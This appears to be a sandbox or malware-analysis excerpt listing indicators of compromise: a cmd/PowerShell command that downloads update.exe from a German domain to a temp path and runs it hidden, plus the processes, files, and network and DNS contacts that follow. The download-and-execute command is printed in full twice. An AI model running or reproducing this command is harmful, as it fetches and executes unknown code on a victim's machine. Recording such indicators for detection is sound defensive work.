Technical Information
- http://pflanzencenter-dinslage.de/update.exe as %temp%\ziga.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://pflanzencenter-dinslage.de/update.exe','%TMP%\ziga.exe');Start-Process '%TMP%\ziga.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1924
- %TEMP%\1263748.cvr
- 'pf######center-dinslage.de':80
- 'pf######center-dinslage.de':443
- http://pf######center-dinslage.de/update.exe
- 'pf######center-dinslage.de':443
- DNS ASK pf######center-dinslage.de
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://pflanzencenter-dinslage.de/update.exe','%TMP%\ziga.exe');Start-Process '%TMP%\ziga.exe';' (with hidden window)